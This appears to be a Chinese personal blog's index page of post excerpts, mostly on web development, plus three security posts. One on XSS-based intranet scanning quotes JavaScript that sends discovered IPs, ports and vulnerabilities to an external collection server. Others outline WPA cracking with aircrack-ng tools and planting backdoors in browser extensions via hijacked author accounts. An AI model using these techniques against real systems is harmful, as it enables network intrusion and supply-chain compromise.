Black-Hole's Blog

前言 如果你在使用axios的时候，是使用 axios.create({}) 方法来进行创建 axios 的，那么你会发现你无法使用 all 、 spread 、 Cancel 、 CancelToken 、 isCancel 方法。 我上网查了相关的问题，axios维护者们都是让你重新引入 axios package 来进行完成任务。我不喜欢这种方法，因为重新引入的话，那我的axios配置就会丢失，需要重新配置一遍，太过麻烦。 因为我们项目很多时候，不想使用默认的配置，想使用自定义设置的axios实例。比如设置基础URL和超时时间： 阅读全文...

前言 项目使用的是vue框架，需要一个markdown的编辑框，就在npm上找了一下，发现 simplemde 挺不错的，由于我比较懒，就顺便在npm又搜了一下，找到了 vue-simplemde 这个 package ，那就开始使用它吧。 但是这个 vue-simplemde 不支持图片拖拽上传、粘贴上传，也不能说是因为这个 vue-simplemde ，因为 vue-simplemde 只是对 simplemde 的基础上封装成一个Vue插件。所以最后还是由于 simplemde 没有提供相关的功能，但是为了用户体验考虑，这个功能时必要的，除非不使用markdown编辑器。而去使用富文本编辑器，那样的话，项目很多的代码都要进行更改。所以就在网上查了文章，及在github上查了一些代码。下面将进行分析 阅读全文...

前言 因为一些原因，需要在自己的笔记本上运行qcow2镜像。做个OpenStack平台吧，系统配置吃不消。想试一下能不能在vmware里直接跑qcow2镜像。网上的答案都是使用 qemu-img 工具进行转化，但是都后面也就没有说明了。于是自己折腾了一下，把过程记录一下。 准备 需要先下载 qemu-img 工具，因为我是在windows64位上，所以就下载了 win64的镜像 ，工具安装好后，最好在环境变量里的 PATH 里加入下一安装目录，方便后面的操作 Vmware虚拟机、qcow2原始镜像包就不说了，必备的。 阅读全文...

前言 在ES6里，增加了 Promise 方法。而 Promise 的回调函数只有 then 和 catch 两种方法。 而后，Promise又添加了两种附加方法，当然需要自己去添加进去。 一个是 done 方法: http://es6.ruanyifeng.com/#docs/promise#done 一个是 finally 方法： http://es6.ruanyifeng.com/#docs/promise#finally 可以去看一下上文的链接去了解一下，或者去下面的链接，看下官方源码是如何实现的: done 和 finally 阅读全文...

Numpy & Pandas & Matplotilb部分API操作 Numpy 导入 import numpy as np API 创建数组 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 阅读全文...

背景介绍 目前使用的技术栈是：前端Vue、后端Koa、数据库Mongodb。 然而每当起服务的时候，都要 npm start 、 node ./server/app.js ，还要同时保持这两个窗口一直是开着的，很是麻烦。 而且因为我使用的是koa，也没有使用狼叔写的koa脚手架。是自己基于廖雪峰老师的 Koa框架 改的一个小型mvc。导致没有热更新。 为了简化这种没必要的操作及增加热更新，开始想怎么进行优化。于是选择了 pm2 阅读全文...

浏览器调起本地应用的原理是 URLProtocol 技术，详情可以在 http://www.cnblogs.com/wang726zq/archive/2012/12/11/UrlProtocol.html http://blog.csdn.net/zssureqh/article/details/25828683 里查看。 其中 在注册表的 [HKEY_CLASSES_ROOT] 主键下，我们可以看到很多的 URLProtocol 。 阅读全文...

0x01 前言： 很多人都认为XSS只能做盗取cookies的活。以至于有些SRC、厂商对待反射型XSS视而不见，或者说是根本不重视。 直到“黑哥”在之前的演讲中提到XSS入侵内网，情况才得以好转。但是经过本人测试，黑哥所说的XSS内网入侵，应该是包含了浏览器漏洞。那没有浏览器漏洞该如何呢？就像0x_Jin之前在乌云报道的搜狐漏洞那样： http://www.wooyun.org/bugs/wooyun-2014-076685 这里有几个需要注意的地方：由于浏览器的同源策略问题导致没有办法做到真正意义上的内网入侵，当然如果你又浏览器的0day，那事情就另当别论了。 而0x_Jin在乌云中的那篇漏洞报告，我自己本人也去问了。答复就是只是检测了开放的80端口，就没有后续了。黑哥没有公布完整的代码，0x_Jin没有深入。既然都没有，就交给我吧。这里我将会使用其他办法“绕过浏览器的同源策略”。 0x02构架： 代码采用了类似XSS平台那种实时反馈机制。在这里我先把变量介绍一遍： 1 2 3 4 5 6 7 8 var onlyString = "abc" ; var ipList = []; var survivalIpLIst = []; var deathIpLIst = []; var sendsurvivalIp = "http://webrtcxss.cn/Api/survivalIp" ; var snedIteratesIpUrl = "http://webrtcxss.cn/Api/survivalPortIp" ; var snedIteratesCmsIpUrl = "http://webrtcxss.cn/Api/survivalCmsIp" ; var sendExistenceVul = "http://webrtcxss.cn/Api/existenceVul" ; 阅读全文...

0x0 前言： 很多的公司都没有安全团队，只有运维来负责整个公司的安全，从而安全问题也大打折扣。我最近一直在给各个公司做安全检测，就把自己的心得写下来，有什么不足之处还望补充。 0x1 无线安全： 很多的公司都有不怎么注重公司的无线电安全，有钱的公司买设备，没钱的公司搞人力。但是人的技术在好，没有设备的辅助，单纯的人力在厉害也没什么用。 很多的公司WIFI认证基本都是WPA/WPA2然后加个WEB二次认证，认为这样就万无一失了，而其实这并没有什么用。破解WPA，可以使用aircrack-ng、airmon-ng、airodump-ng、aireplay-ng来实现破解，WPA2使用字典穷举。 当然也可以使用大菠萝伪造一个WIFI。而大家也都知道有一款神器叫做“wifi万能钥匙”，可以先去看看wifi万能钥匙能不能解，不能解的话再破。连上WIFI后，将会提示你需要进行WEB二次认证。这里你完全可以弃之不理，因为它并没有什么用。 因为你是WPA/WPA2的认证方式，你连上WIFI之后，交换机就会马上分配给你一个内网IP（我遇到的是交换机，也可能是路由器）一个黑客要你外网干什么，他需要的是公司的内网资源。 阅读全文...

0x0 前言： 我在很多地方都有说“浏览器插件的攻击方法”，本篇文章就带大家深入的研究一下“由浏览器插件引发的攻击手法及攻击代码”。本篇文章说的内容，可以给大家打开一个新的攻击思路，做APT攻击的话也会有奇效。 0x1 让自己变成攻击者： 我之前在群里问了一下，发现很多人都只是听说过，虽然知道原理。但是没有进行实践并且小瞧了这个攻击方式。而且这个攻击手法的案例也是少的可怜。没有攻何来守，之前chrome有过类似的攻击手法，但是攻击代码所做的事比较少，于是本篇我们先成为攻击者，站在攻击者的角度来研究这个攻击手法。之前我在介绍这个攻击手法的时候都是在文章里开一个小节来说的。现在我专门来为这个攻击方法写篇文章，也希望让大家重视起来。 在大家的理解里，浏览器插件攻击就是在插件里植入javascript代码，做一些盗取cookies的事情，但是事情远没有那么简单。 大家都知道进行“浏览器插件攻击”就需要用户安装了你的插件。大家也都认为只有这一种方法，但是事实并非如此，下面是4种安装插件的方法： 在页面里欺骗用户，写上“如想浏览此页面，请去下载某某插件” 被动等待，类似：姜太公钓鱼愿者上钩的感觉，插件就在那，你不安装总会有人安装 基于社工库控制插件作者的账户，加入后门代码，更新插件 控制插件里调用的第三方javascript代码 现在有四种方法供我们选择，我们一个个来进行介绍。 阅读全文...